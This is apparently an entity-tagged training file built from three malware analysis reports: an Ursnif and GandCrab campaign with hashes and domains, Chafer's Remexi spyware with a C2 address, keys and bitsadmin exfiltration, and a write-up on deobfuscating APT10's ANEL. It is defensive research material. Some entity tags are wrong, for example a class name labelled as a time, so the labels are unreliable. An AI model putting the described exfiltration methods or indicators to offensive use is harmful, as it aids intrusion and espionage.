O + +In O +this O +instance O +it O +is O +saved O +to O +the O +C:\ProgramData O +directory O +with O +a O +pseudo O +random O +name O +. O + +It O +should O +be O +noted O +that O +the O +file O +name O +was O +changed O +throughout O +this O +campaign O +. O + +Once O +executed O +the O +Ursnif S-MAL +sample O +will O +conduct O +the O +typical O +actions O +observed O +in O +Ursnif S-MAL +samples O +, O +like O +credential O +harvesting O +, O +gathering O +system O +and O +process O +information O +, O +and O +deploying O +additional O +malware O +samples O +. O + +The O +information O +for O +this O +specific O +sample O +is O +listed O +below O +. O + +However O +, O +numerous O +Ursnif S-MAL +variants O +were O +hosted O +on O +the O +bevendbrec.com S-DOM +site O +during O +this O +campaign O +. O + +Carbon B-SECTEAM +Black E-SECTEAM +was O +able O +to O +discover O +approximately O +120 O +different O +Ursnif S-MAL +variants O +that O +were O +being O +hosted O +from O +the O +domains O +iscondisth.com S-DOM +and O +bevendbrec.com S-DOM +. O +irongreen.exe S-FILE +: O +404d25e3a18bda19a238f77270837198 S-MD5 +c064f6f047a4e39014a29c8c95526c3fe90d7bcea5ef0b8f21ea306c27713d1f S-SHA2 +, O +Sun B-TIME +Dec I-TIME +18 I-TIME +11:04:31 I-TIME +2011 E-TIME +UTC O +. O +irongreen.text S-FILE +: O +85aa9117c381eae3d181ab63daab335e S-MD5 +. O +irongreen.rdata S-FILE +: O +3e1c774bc4e0ffc2271075e621aa3f3d S-MD5 +. O +irongreen.data S-FILE +: O +6c389e5e301564f65dcad4811dbded8b S-MD5 +. O +irongreen.rsrc S-FILE +: O +efba623cc62ffd0ccbf7f3fbf6264905 S-MD5 +. O +irongreen.reloc S-FILE +: O +6cf46599a57a6cbc5d18fbb2883620ce S-MD5 +. O + +While O +researching O +this O +campaign O +approximately O +180 O +variants O +were O +located O +in O +the O +wild O +. 
O + +Using O +the O +VirusTotal B-TOOL +Graph E-TOOL +functionality O +these O +variants O +could O +be O +organized O +into O +several O +groups O +that O +were O +commonly O +associated O +by O +either O +metadata O +or O +document O +structures O +like O +macros O +or O +embedded O +image O +files O +( O +depicted O +in O +the O +image O +below O +) O +. O + +The O +image O +below O +highlights O +the O +nodes O +associated O +with O +the O +samples O +analyzed O +in O +this O +report O +. O + +The O +graph O +can O +also O +be O +viewed O +in O +the O +VTGraph B-TOOL +Console E-TOOL +for O +additional O +exploration O +. O + +The O +graph O +highlights O +the O +at O +least O +3 O +different O +variants O +of O +Ursnif S-MAL +that O +were O +being O +hosted O +on O +the O +bevendbrec.com S-DOM +site O +. O + +The O +Ursnif S-MAL +variants O +were O +primarily O +grouped O +by O +C2 S-TOOL +infrastructure O +. O + +The O +large O +grouping O +on O +the O +right O +of O +the O +diagram O +are O +direct O +variants O +of O +the O +sample O +referenced O +in O +this O +write O +up O +. O + +Samples O +in O +this O +grouping O +were O +all O +hosted O +on O +sites O +that O +were O +called O +by O +the O +second O +stage O +. O + +The O +samples O +had O +minor O +changes O +, O +and O +were O +presumably O +changed O +by O +the O +attackers O +to O +avoid O +detection O +by O +hash O +. 
O + +Word B-MAL +Dropper E-MAL +Variant O +cc5a14ff026ee593d7d25f213715b73833e6b9cf71091317121a009d5ad7fc36 S-SHA2 +7ce3d9fc86396fac9865607594395e94 S-MD5 +Word B-MAL +Dropper E-MAL +Variant O +28a8d6b8a0cdcb25d098e403cc8b6dcb855cb591f0b54c2e3363b5c580d92b28 S-SHA2 +74c7aed44680100e984251ce2cdbdbc6 S-MD5 +Word B-MAL +Dropper E-MAL +Variant O +facbc2cb089668197ca3968a3433b6f4826430c13f7d1c75b44667307c67dfe3 S-SHA2 +10f308d78adda567d4589803ce18cc9b S-MD5 +Word B-MAL +Dropper E-MAL +Variant O +e714a5147335245c386b105bb7494a8b190b6a737ba28f029561efe48105cd11 S-SHA2 +f279d0f04874327b85221697d99de321 S-MD5 +Word B-MAL +Dropper E-MAL +Variant O +56c46ef3d5bd544fa35f6e336d3be93cf36e72d0273fa1dbc915979f2d883e9d S-SHA2 +bc1b322e7efc19417ab0d0524ccb9ff2 S-MD5 +. O + +Ursnif S-MAL +Variant O +446ffd272c79554a19b5f4299327fb74b8ff457681d10571caa6eea51ec406b0 S-SHA2 +ea7e1650031c92b7377788f05926034e S-MD5 +Ursnif S-MAL +Variant O +42636f3185c9e398958aad272d983c8b8b1409df4ce93f1f8f608e190290f56d S-SHA2 +377cd85d8d68fc58976a123aa151c5e0 S-MD5 +Ursnif S-MAL +Variant O +24b2141c1134ef14f33a38c58342b6573940c5460d03a2945fafac36e32e6889 S-SHA2 +b73cbffea8094cfa18b067d9568c53e7 S-MD5 +Ursnif S-MAL +Variant O +e53b0a60c238c45019089bdf7f16d5f47b7ba15ca2c918e385c41f0c2076eb52 S-SHA2 +24fe5a6196e32749cd030ab51824cabe S-MD5 +Ursnif S-MAL +Variant O +4c8de1713f830819e8354b653fd19a5cafd0bc8fa3145eedf555f24261c874de S-SHA2 +589734cb60aa515599c687539c520049 S-MD5 +. 
O + +GandCrab S-MAL +Variant O +d6c53d9341dda1252ada3861898840be4d669abae2b983ab9bf5259b84de7525 S-SHA2 +ce1ee671fe5246a9c40b624ef97e4de1 S-MD5 +GandCrab S-MAL +Variant O +aca0b96126c813b0d29d6fbff9175f8ca62ff2ec6eed83bff76a73ae717cfcb8 S-SHA2 +07f955796a252771861c8e0db06b1f01 S-MD5 +GandCrab S-MAL +Variant O +8cd45f8c8f2ed0109db6a64f9945f3dcb8a780f65c76aedded7b8af95e6dc7ec S-SHA2 +4fcd0d13ea669a83a749ae5bfb098ca2 S-MD5 +GandCrab S-MAL +Variant O +933210a9d19b25e0711ae88eece1ba06bb035a01ab2880cc707ff55bdd3b8dd0 S-SHA2 +8ec87fd3ea777fa8d5160dc957e6683e S-MD5 +GandCrab S-MAL +Variant O +e564e87958b3e76bc9bfeb5bed773b7a17f3a82f84872acdbb609aa43a9cd776 S-SHA2 +c7d5077960882259b85c01fd41c49ffd S-MD5 +. O + + +Chafer S-APT +used O +Remexi S-MAL +malware O +to O +spy O +on O +Iran-based O +foreign O +diplomatic O +entities O +Throughout O +the O +autumn O +of O +2018 O +we O +analyzed O +a O +long-standing O +(and O +still O +active O +at O +that O +time) O +cyber-espionage O +campaign O +that O +was O +primarily O +targeting O +foreign O +diplomatic O +entities O +based O +in O +Iran S-LOC +. O + +The O +attackers O +were O +using O +an O +improved O +version O +of O +Remexi S-MAL +in O +what O +the O +victimology O +suggests O +might O +be O +a O +domestic O +cyber-espionage O +operation +. O + +This O +malware O +has O +previously O +been O +associated O +with O +an O +APT O +actor O +that O +Symantec S-IDTY +calls O +Chafer S-APT +. O + +The O +malware O +can O +exfiltrate O +keystrokes, O +screenshots, O +browser-related O +data O +like O +cookies O +and O +history, O +decrypted O +when O +possible +. 
O + +The O +attackers O +rely O +heavily O +on O +Microsoft S-IDTY +technologies O +on O +both O +the O +client O +and O +server O +sides: O +the O +Trojan S-TOOL +uses O +standard O +Windows S-OS +utilities O +like O +Microsoft B-TOOL +Background I-TOOL +Intelligent I-TOOL +Transfer I-TOOL +Service E-TOOL +(BITS S-TOOL +) O +bitsadmin.exe S-FILE +to O +receive O +commands O +and O +exfiltrate O +data +. O + +Its O +C2 S-TOOL +is O +based O +on O +IIS S-TOOL +using O +.asp S-FILE +technology O +to O +handle O +the O +victims’ O +HTTP O +requests +. O + +Remexi S-MAL +developers O +use O +the O +C S-TOOL +programming O +language O +and O +GCC S-TOOL +compiler O +on O +Windows S-OS +in O +the O +MinGW S-TOOL +environment +. O + +They O +most O +likely O +used O +the O +Qt B-TOOL +Creator I-TOOL +IDE E-TOOL +in O +a O +Windows S-OS +environment +. O + +The O +malware O +utilizes O +several O +persistence O +mechanisms O +including O +scheduled O +tasks, O +Userinit O +and O +Run O +registry O +keys O +in O +the O +HKLM S-TOOL +hive +. O + +XOR S-ENCR +and O +RC4 S-ENCR +encryption O +is O +used O +with O +quite O +long O +unique O +keys O +for O +different O +samples +. O + +Among O +all O +these O +random O +keys O +once O +the O +word O +“salamati” O +was O +also O +used, O +which O +means O +“health” O +in O +Farsi S-LOC +. O + +Kaspersky B-SECTEAM +Lab E-SECTEAM +products O +detect O +the O +malware O +described O +in O +this O +report O +as O +Trojan.Win32.Remexi S-FILE +and O +Trojan.Win32.Agent S-FILE +. O + +This O +blogpost O +is O +based O +in O +our O +original O +report O +shared O +with O +our O +APT O +Intelligence O +Reporting O +customers O +last B-TIME +November I-TIME +2018 E-TIME +. O + +The O +main O +tool O +used O +in O +this O +campaign O +is O +an O +updated O +version O +of O +the O +Remexi S-MAL +malware, O +publicly O +reported O +by O +Symantec S-IDTY +back O +in O +2015 S-TIME +. 
O + +The O +newest O +module’s O +compilation O +timestamp O +is O +March B-TIME +2018 E-TIME +. O + +The O +developers O +used O +GCC S-TOOL +compiler O +on O +Windows S-OS +in O +the O +MinGW S-TOOL +environment +. O + +Inside O +the O +binaries O +the O +compiler O +left O +references O +to O +the O +names O +of O +the O +C S-TOOL +source O +file O +modules O +used: O +operation_reg.c S-FILE +, O +thread_command.c S-FILE +and O +thread_upload.c S-FILE +. O + +Like O +mentioned O +in O +modules O +file O +names O +the O +malware O +consists O +of O +several O +working O +threads O +dedicated O +to O +different O +tasks, O +including O +C2 S-TOOL +command O +parsing O +and O +data O +exfiltration +. O + +For O +both O +the O +receiving O +of O +C2 S-TOOL +commands O +and O +exfiltration, O +Remexi S-MAL +uses O +the O +Microsoft B-TOOL +Background I-TOOL +Intelligent I-TOOL +Transfer I-TOOL +Service E-TOOL +(BITS S-TOOL +) O +mechanism O +to O +communicate O +with O +the O +C2 S-TOOL +over O +HTTP +. O + +So O +far, O +our O +telemetry O +hasn’t O +provided O +any O +concrete O +evidence O +that O +shows O +us O +how O +the O +Remexi S-MAL +malware O +spread +. O + +However, O +we O +think O +it’s O +worth O +mentioning O +that O +for O +one O +victim O +we O +found O +a O +correlation O +between O +the O +execution O +of O +Remexi´s O +main O +module O +and O +the O +execution O +of O +an O +AutoIt S-TOOL +script O +compiled O +as O +PE S-TOOL +, O +which O +we O +believe O +may O +have O +dropped O +the O +malware +. O + +This O +dropper O +used O +an O +FTP O +with O +hardcoded O +credentials O +to O +receive O +its O +payload +. O + +FTP O +server O +was O +not O +accessible O +any O +more O +at O +the O +time O +of O +our O +analysis +. 
O + +Remexi S-MAL +boasts O +features O +that O +allow O +it O +to O +gather O +keystrokes, O +take O +screenshots O +of O +Windows S-OS +of O +interest O +(as O +defined O +in O +its O +configuration), O +steal O +credentials, O +logons O +and O +the O +browser O +history, O +and O +execute O +remote O +commands +. O + +Encryption O +consists O +of O +XOR S-ENCR +with O +a O +hardcoded O +key O +for O +its O +configuration O +and O +RC4 S-ENCR +with O +a O +predefined O +password O +for O +encrypting O +the O +victim’s O +data +. O + +Remexi S-MAL +includes O +different O +modules O +that O +it O +deploys O +in O +its O +working O +directory, O +including O +configuration O +decryption O +and O +parsing, O +launching O +victim O +activity O +logging O +in O +a O +separate O +module, O +and O +seven O +threads O +for O +various O +espionage O +and O +auxiliary O +functions +. O + +The O +Remexi O +developers O +seem O +to O +rely O +on O +legitimate O +Microsoft S-IDTY +utilities, O +which O +we O +enumerate O +in O +the O +table O +below: O +extract.exe S-FILE +Deploys O +modules O +from O +the O +.cab S-FILE +file O +into O +the O +working O +Event O +Cache O +directory, O +bitsadmin.exe S-FILE +Fetches O +files O +from O +the O +C2 S-TOOL +server O +to O +parse O +and O +execute O +commands +. O + +Send O +exfiltrated O +data, O +taskkill.exe S-FILE +Ends O +working O +cycle O +of O +modules +. O + +Persistence O +modules O +are O +based O +on O +scheduled O +tasks O +and O +system O +registry +. O + +Mechanisms O +vary O +for O +different O +OS O +versions +. O + +In O +the O +case O +of O +old O +Windows S-OS +versions O +like O +XP S-OS +, O +main O +module O +events.exe S-FILE +runs O +an O +edited O +XPTask.vbs S-FILE +Microsoft S-IDTY +sample O +script O +to O +create O +a O +weekly O +scheduled O +task O +for O +itself +. O + +For O +newer O +operating O +systems, O +events.exe S-FILE +creates O +task.xml S-FILE +. 
O + +To O +decrypt O +the O +configuration O +data, O +the O +malware O +uses O +XOR S-ENCR +with O +25-character O +keys O +such O +as O +“waEHleblxiQjoxFJQaIMLdHKz” O +that O +are O +different O +for O +every O +sample +. O + +RC4 S-ENCR +file O +encryption O +relies O +on O +the O +Windows S-OS +32 O +CryptoAPI S-TOOL +, O +using O +the O +provided O +value’s O +MD5 S-ENCR +hash O +as O +an O +initial O +vector +. O + +Among O +all O +these O +random O +keys O +once O +the O +word O +“salamati” O +was O +also O +used, O +which O +means O +“health” O +in O +Farsi +. O + +Config.ini S-FILE +is O +the O +file O +where O +the O +malware O +stores O +its O +encrypted O +configuration O +data.List O +of O +files O +to O +send O +to O +C2 S-TOOL +using O +bitsadmin.exe S-FILE +from O +the O +dedicated O +thread: O +upLog.txt S-FILE +, O +upSCRLog.txt S-FILE +, O +upSpecial.txt S-FILE +, O +upFile.txt S-FILE +, O +upMSLog.txt S-FILE +. O +http://108.61.189.174 S-URL +control O +server O +HTTP S-PROT +URL +. O + +KtJvOXulgibfiHk O +is O +the O +password O +for O +uploaded O +zip O +archives +. O + +One O +of O +the O +malware O +threads O +checks O +in O +an O +infinite O +loop O +if O +the O +mouse O +button O +was O +pressed O +and O +then O +also O +increments O +the O +integer O +iterator O +infinitely +. O + +If O +the O +mouse O +hooking O +function O +registers O +a O +button O +hit, O +it O +lets O +the O +screenshotting O +thread O +know O +about O +it O +through O +a O +global O +variable +. O + +After O +that, O +it O +checks O +if O +the O +iterator O +divided O +by O +(captureScreenTimeOut/captureActiveWindowTimeOut) O +has O +a O +remainder O +of O +0 +. O + +In O +that O +case, O +it O +takes O +a O +screenshot +. 
O + +events.exe S-FILE +: O +b1fa803c19aa9f193b67232c9893ea57574a2055791b3de9f836411ce000ce31 S-SHA2 +, O +c981273c32b581de824e1fd66a19a281 S-MD5 +, O +GCC S-TOOL +compiler O +in O +MinGW S-TOOL +environment O +version O +2.24, O +I386 O +Windows S-OS +GUI S-TOOL +EXE S-TOOL +. O + +After O +checking O +that O +the O +malware O +is O +not O +already O +installed O +, O +it O +unpacks O +HCK.cab S-FILE +using O +the O +Microsoft S-IDTY +standard O +utility O +expand.exe S-FILE +. O + +Splitter.exe S-FILE +: O +a77f9e441415dbc8a20ad66d4d00ae606faab370ffaee5604e93ed484983d3ff S-SHA2 +, O +1ff40e79d673461cd33bd8b68f8bb5b8 S-MD5 +, O +2017.08.06 B-TIME +11:32:36 E-TIME +(GMT), O +I386 O +Windows S-OS +Console S-TOOL +EXE S-TOOL +. O + +Exfiltration S-ACT +is O +done O +through O +the O +bitsadmin.exe S-FILE +utility +. O + +The O +BITS S-TOOL +mechanism O +has O +existed O +since O +Windows B-OS +XP E-OS +up O +to O +the O +current O +Windows B-OS +10 E-OS +versions O +and O +was O +developed O +to O +create O +download/upload O +jobs, O +mostly O +to O +update O +the O +OS O +itself +. O + +The O +vast O +majority O +of O +the O +users O +targeted O +by O +this O +new O +variant O +of O +Remexi S-MAL +appear O +to O +have O +Iranian S-LOC +IP O +addresses +. O + +Some O +of O +these O +appear O +to O +be O +foreign O +diplomatic O +entities O +based O +in O +the O +country +. O + +The O +Remexi S-MAL +malware O +has O +been O +associated O +with O +an O +APT O +actor O +called O +Chafer S-APT +by O +Symantec S-IDTY +. O + +One O +of O +the O +human-readable O +encryption O +keys O +used O +is O +“salamati” +. O + +This O +is O +probably O +the O +Latin O +spelling O +for O +the O +word O +“health” O +in O +Farsi S-LOC +. O + +Among O +the O +artifacts O +related O +to O +malware O +authors, O +we O +found O +in O +the O +binaries O +a O +.pdb S-FILE +path O +containing O +the O +Windows S-OS +user O +name O +“Mohamadreza O +New” +. 
O + +Interestingly, O +the O +FBI S-IDTY +website O +for O +wanted O +cybercriminals O +includes O +two O +Iranians O +called O +Mohammad O +Reza, O +although O +this O +could O +be O +a O +common O +name O +or O +even O +a O +false O +flag +. O + +Activity O +of O +the O +Chafer S-APT +APT O +group O +has O +been O +observed O +since O +at O +least O +2015 S-TIME +, O +but O +based O +on O +things O +like O +compilation O +timestamps O +and O +C&C O +registration, O +it’s O +possible O +they O +have O +been O +active O +for O +even O +longer +. O + + +Defeating O +Compiler-Level O +Obfuscations O +Used O +in O +APT10 S-APT +Malware O +. O + +The B-SECTEAM +Carbon I-SECTEAM +Black I-SECTEAM +Threat I-SECTEAM +Analysis I-SECTEAM +Unit E-SECTEAM +( O +TAU S-SECTEAM +) O + +recently O +analyzed O +a O +series O +of O +malware O +samples O +that O +utilized O +compiler-level O +obfuscations O +. O + +For O +example O +, O + +opaque O +predicates O +were O +applied O +to O +Turla S-APT +mosquito S-MAL +and O +APT10 S-APT +ANEL S-MAL +. O + +Another O +obfuscation O +, O + +control O +flow O +flattening O +, O + +was O +applied O +to O +APT10 S-APT +ANEL S-MAL +and O +Dharma S-MAL +ransomware O +packer O +. O + +ANEL S-MAL +( O +also O +referred O +to O +as O +UpperCut S-MAL +) O + +is O +a O +RAT O +program O +used O +by O +APT10 S-APT +and O +observed O +in O +Japan S-LOC +uniquely O +. O + +According O +to O +SecureWorks S-SECTEAM +, O + +all O +ANEL S-MAL +samples O +whose O +version O +is O +5.3.0 O +or O +later O +are O +obfuscated O +with O +opaque O +predicates O +and O +control O +flow O +flattening O +. O + +Opaque O +predicate O +is O +a O +programming O +term O +that O +refers O +to O +decision O +making O +where O +there O +is O +actually O +only O +one O +path O +. O + +For O +example O +, O + +this O +can O +be O +seen O +as O +calculating O +a O +value O +that O +will O +always O +return O +True O +. 
O + +Control O +flow O +flattening O +is O +an O +obfuscation O +method O +where O +programs O +do O +not O +cleanly O +flow O +from O +beginning O +to O +end O +. O + +Instead O +, O + +a O +switch O +statement O +is O +called O +in O +an O +infinite O +loop O +having O +multiple O +code O +blocks O +each O +performing O +operations O +. O + +The O +obfuscations O +looked O +similar O +to O +the O +ones O +explained O +in O +Hex-Rays O +blog O +, O + +but O +the O +introduced O +IDA B-TOOL +Pro E-TOOL +plugin O +HexRaysDeob S-TOOL +didn’t O +work O +for O +one O +of O +the O +obfuscated O +ANEL S-MAL +samples O +because O +the O +tool O +was O +made O +for O +another O +variant O +of O +the O +obfuscation O +. O + +TAU S-SECTEAM +investigated O +the O +ANEL S-MAL +obfuscation O +algorithms O +then O +modified O +the O +HexRaysDeob S-TOOL +code O +to O +defeat O +the O +obfuscations O +. O + +After O +the O +modification O +, O + +TAU S-SECTEAM +was O +able O +to O +recover O +the O +original O +code O +. O + +HexRaysDeob S-TOOL +is O +an O +IDA B-TOOL +Pro E-TOOL +plugin O +written O +by O +Rolf O +Rolles O +to O +address O +obfuscation O +seen O +in O +binaries O +. O + +In O +order O +to O +perform O +the O +deobfuscation O +, O + +the O +plugin O +manipulates O +the O +IDA O +intermediate O +language O +called O +microcode O +. O + +If O +you O +aren’t O +familiar O +with O +those O +structures O +( O +e.g O +, O + +microcode O +data O +structures O +, O + +maturity O +level O +, O + +Microcode B-TOOL +Explorer E-TOOL +and O +so O +on O +) O + +, O + +you O +should O +read O +his O +blog O +post O +. O + +Rolles O +also O +provides O +an O +overview O +of O +each O +obfuscation O +technique O +in O +the O +same O +post O +. 
O + +HexRaysDeob S-TOOL +installs O +two O +callbacks O +when O +loading O +: O + +optinsn_t S-TOOL +for O +defeating O +opaque O +predicates O +( O +defined O +as O +ObfCompilerOptimizer S-TOOL +) O + + +optblock_t S-TOOL +for O +defeating O +control O +flow O +flattening O +( O +defined O +as O +CFUnflattener S-TIME +) O + +. O + +Before O +continuing O +, O + +it O +is O +important O +to O +understand O +Hex-Rays S-TOOL +maturity O +levels O +. O + +When O +a O +binary O +is O +loaded O +into O +IDA B-TOOL +Pro E-TOOL +, O + +the O +application O +will O +perform O +distinct O +layers O +of O +code O +analysis O +and O +optimization O +, O + +referred O +to O +as O +maturity O +levels O +. O + +One O +layer O +will O +detect O +shellcode O +, O + +another O +optimizes O +it O +into O +blocks O +, O + +another O +determines O +global O +variables O +, O + +and O +so O +forth O +. O + +The O +optinsn_t B-TOOL +: I-TOOL +:f I-TOOL +unc E-TOOL +callback O +function O +is O +called O +in O +maturity O +levels O +from O +MMAT_ZERO S-TOOL +( O +microcode O +does O +not O +exist O +) O + +to O +MMAT_GLBOPT2 S-TOOL +( O +most O +global O +optimizations O +completed O +) O + +. O + +During O +the O +callback O +, O + +opaque O +predicates O +pattern O +matching O +functions O +are O +called O +. O + +If O +the O +code O +pattern O +is O +matched O +with O +the O +definitions O +, O + +it O +is O +replaced O +with O +another O +expression O +for O +the O +deobfuscation O +. O + +This O +is O +important O +to O +perform O +in O +each O +maturity O +level O +as O +the O +obfuscated O +code O +could O +be O +modified O +or O +removed O +as O +the O +code O +becomes O +more O +optimized O +. O + +We O +defined O +two O +patterns O +for O +analysis O +of O +the O +ANEL S-MAL +sample O +. 
O + +The O +global O +variable O +value O +dword_745BB58C O +is O +either O +even O +or O +odd O +, O + +so O +dword_745BB58C O +* O +( O +dword_745BB58C O +– O +1 O +) O + +is O +always O +even O +. O + +This O +results O +in O + +the O +lowest O +bit O +of O +the O +negated O +value O +becoming O +1 O +. O + +Thus O +, O + +OR O +by O +-2 O +( O +0xFFFFFFFE O +) O + +will O +always O +produce O +the O +value O +-1 O +. O + +In O +this O +case O +, O + +the O +pattern O +matching O +function O +replaces O +dword_745BB58C O +* O +( O +dword_745BB58C O +– O +1 O +) O + +with O +2 O +. O + +The O +global O +variable O +value O +dword_72DBB588 O +is O +always O +0 O +because O +the O +value O +is O +not O +initialized O +( O +we O +can O +check O +it O +by O +is_loaded B-TOOL +API E-TOOL +) O + +and O +has O +only O +read O +accesses O +. O + +So O +the O +pattern O +matching O +function O +replaces O +the O +global O +variable O +with O +0 O +. O + +There O +are O +some O +variants O +with O +this O +pattern O +( O +e.g O +, O +the O +variable O +– O +10 O +< O +0 O +) O + +, O + +where O +the O +immediate O +constant O +can O +be O +different O +. O + +We O +also O +observed O +a O +pattern O +that O +was O +also O +using O +an O +8-bit O +portion O +of O +the O +register O +. O + +In O +the O +following O +example O +, O + +the O +variable O +v5 O +in O +pseudocode O +is O +a O +register O +operand O +( O +cl O +) O + +in O +microcode O +. O + +We O +need O +to O +check O +if O +the O +value O +comes O +from O +the O +result O +of O +x O +* O +( O +x O +– O +1 O +) O + +. O + +In O +another O +example O +, O + +the O +variable O +v2 O +in O +pseudocode O +is O +a O +register O +operand O +( O +ecx O +) O + +in O +microcode O +. O + +We O +have O +to O +validate O +if O +a O +global O +variable O +with O +above-mentioned O +conditions O +is O +assigned O +to O +the O +register O +. 
O + +Data-flow O +tracking O +code O +was O +added O +to O +detect O +these O +use-cases O +. O + +The O +added O +code O +requires O +that O +the O +mblock_t S-TOOL +pointer O +information O +is O +passed O +from O +the O +argument O +of O +optinsn_t B-TOOL +: I-TOOL +:f I-TOOL +unc E-TOOL +to O +trace O +back O +previous O +instructions O +using O +the O +mblock_t S-TOOL +linked O +list O +. O + +However O +, O + +the O +callback O +returns O +NULL O +from O +the O +mblock_t S-TOOL +pointer O +if O +the O +instruction O +is O +not O +a O +top-level O +one O +. O + +If O +the O +setl O +is O +always O +sub-instruction O +during O +the O +optimization O +, O + +we O +never O +get O +the O +pointer O +. O + +To O +handle O +this O +type O +of O +scenario O +, O + +the O +code O +was O +modified O +to O +catch O +and O +pass O +the O +mblock_t S-TOOL +of O +the O +jnz O +instruction O +to O +the O +sub-instruction O +. O + +The O +original O +implementation O +calls O +the O +optblock_t B-TOOL +: I-TOOL +:f I-TOOL +unc E-TOOL +callback O +function O +in O +MMAT_LOCOPT S-TOOL +( O +local O +optimization O +and O +graphing O +are O +complete O +) O + +maturity O +level O +. O + +Rolles O +previously O +explained O +the O +unflattening O +algorithm O +in O +a O +Hex-Rays S-TOOL +blog O +. O + +For O +brevity O +I O +will O +quickly O +cover O +some O +key O +points O +to O +understand O +the O +algorithm O +at O +a O +high O +level O +. O + +Normally O +the O +call O +flow O +graph O +( O +CFG O +) O + +of O +a O +function O +obfuscated O +with O +control O +flow O +flattening O +has O +a O +loop O +structure O +starting O +with O +yellow-colored O +“ O +control O +flow O +dispatcher O +” O + +like O +this O +, O + +shown O +after O +the O +First O +Block O +. O + +The O +original O +code O +is O +separated O +into O +the O +orange-colored O +“ O +first O +block O +” O + +and O +green-colored O +flattened O +blocks O +. 
O + +The O +analyst O +is O +then O +required O +to O +resolve O +the O +correct O +next O +block O +and O +modify O +the O +destination O +accordingly O +. O + +The O +next O +portion O +of O +first O +block O +and O +each O +flattened O +block O +is O +decided O +by O +a O +“ O +block O +comparison O +variable O +” O + +with O +an O +immediate O +value O +. O + +The O +value O +of O +the O +variable O +is O +assigned O +to O +a O +specific O +register O +in O +each O +block O +then O +compared O +in O +a O +control O +flow O +dispatcher O +and O +other O +condition O +blocks O +. O + +If O +the O +variable O +registers O +for O +the O +comparison O +and O +assignment O +are O +different O +, O + +the O +assignment O +variable O +is O +called O +“ O +block O +update O +variable O +” O + +( O +which O +is O +further O +explained O +later O +) O + +. O + +The O +algorithm O +looks O +straightforward O +however O +some O +portions O +of O +the O +code O +had O +to O +be O +modified O +in O +order O +to O +correctly O +deobfuscate O +the O +code O +. O + +This O +is O +further O +detailed O +below O +. O + +As O +previously O +detailed O +, O + +the O +original O +implementation O +of O +the O +code O +only O +works O +in O +MMAT_LOCOPT S-TOOL +maturity O +level O +. O + +Rolles O +said O +this O +was O +to O +handle O +another O +obfuscation O +called O +“ O +Odd O +Stack O +Manipulations O +” O + +, O + +referred O +in O +his O +blog O +) O + +. O + +However O +the O +unflattening O +of O +ANEL S-MAL +code O +had O +to O +be O +performed O +in O +the O +later O +maturity O +level O +since O +the O +assignment O +of O +block O +comparison O +variable O +heavily O +depends O +on O +opaque O +predicates O +. O + +As O +an O +example O +in O +the O +following O +obfuscated O +function O +, O + +the O +v3 O +and O +v7 O +variables O +are O +assigned O +to O +the O +block O +comparison O +variable O +( O +b_cmp O +) O + +. 
O + +However O +the O +values O +are O +dependent O +on O +opaque O +predicates O +results O +. O + +Once O +the O +opaque O +predicates O +are O +broken O +, O + +the O +loop O +code O +becomes O +simpler O +. O + +Unflattening O +the O +code O +in O +later O +maturity O +levels O +like O +MMAT_GLBOPT1 S-TOOL +and O +MMAT_GLBOPT2 S-TOOL +( O +first O +and O +second O +pass O +of O +global O +optimization O +) O + +caused O +additional O +problems O +. O + +The O +unflattening O +algorithm O +requires O +mapping O +information O +between O +block O +comparison O +variable O +and O +the O +actual O +block O +number O +( O +mblock_t B-TOOL +: I-TOOL +:s I-TOOL +erial E-TOOL +) O + +used O +in O +the O +microcode O +. O + +In O +later O +maturity O +levels O +, O + +some O +blocks O +are O +deleted O +by O +the O +optimization O +after O +defeating O +opaque O +predicates O +, O + +which O +removes O +the O +mapping O +information O +. O + +In O +the O +example O +below O +, O + +the O +blue-highlighted O +immediate O +value O +0x4624F47C O +is O +assigned O +to O +block O +comparison O +variable O +in O +the O +first O +block O +. O + +The O +mapping O +can O +be O +created O +by O +checking O +the O +conditional O +jump O +instruction O +( O +jnz O +) O + +in O +MMAT_LOCOPT S-TOOL +. O + +Additionally O +here O +is O +no O +mapping O +information O +in O +MMAT_GLBOPT2 S-TOOL +because O +the O +condition O +block O +that O +contains O +the O +variable O +has O +been O +deleted O +. O + +So O +the O +next O +block O +of O +the O +first O +one O +in O +the O +level O +can O +not O +be O +determined O +. O + +To O +resolve O +that O +issue O +, O + +the O +code O +was O +written O +to O +link O +the O +block O +comparison O +variable O +and O +block O +address O +in O +MMAT_LOCOPT S-TOOL +, O + +as O +the O +block O +number O +is O +changed O +in O +each O +maturity O +level O +. 
O + +If O +the O +code O +can’t O +determine O +the O +mapping O +in O +later O +maturity O +levels O +, O + +it O +attempts O +to O +guess O +the O +next O +block O +number O +based O +on O +the O +address O +, O + +considering O +each O +block O +and O +instruction O +addresses O +. O + +The O +guessing O +is O +not O +100% O +accurate O +however O +it O +works O +for O +the O +majority O +of O +obfuscated O +functions O +tested O +. O + +Though O +the O +original O +implementation O +assumes O +an O +obfuscated O +function O +has O +only O +one O +control O +flow O +dispatcher O +, O + +some O +functions O +in O +the O +ANEL O +sample O +have O +multiple O +control O +dispatchers O +. O + +Originally O +the O +code O +called O +the O +optblock_t B-TOOL +: I-TOOL +:f I-TOOL +unc E-TOOL +callback O +in O +MMAT_GLBOPT1 S-TOOL +and O +MMAT_GLBOPT2 S-TOOL +, O + +as O +the O +result O +was O +not O +correct O +in O +MMAT_CALLS S-TOOL +( O +detecting O +call O +arguments O +) O + +. O + +However O +, O + +this O +did O +not O +work O +for O +functions O +with O +three O +or O +more O +dispatchers O +. O + +Additionally O +, O + +Hex-Rays S-TOOL +kernel O +doesn’t O +optimize O +some O +functions O +in O +MMAT_GLBOPT2 S-TOOL +if O +it O +judges O +the O +optimization O +within O +the O +level O +is O +not O +required O +. O + +In O +this O +case O +, O + +the O +callback O +is O +executed O +just O +once O +in O +the O +implementation O +. O + +To O +handle O +multiple O +control O +flow O +dispatchers O +, O + +a O +callback O +for O +decompiler O +events O +was O +implemented O +. O + +The O +code O +catches O +the O +“ O +hxe_prealloc O +” O + +event O +( O +according O +to O +Hex-Rays S-TOOL +, O + +this O +is O +the O +final O +event O +for O +optimizations O +) O + +then O +calls B-TOOL +optblock_t I-TOOL +: I-TOOL +:f I-TOOL +unc E-TOOL +callback O +. 
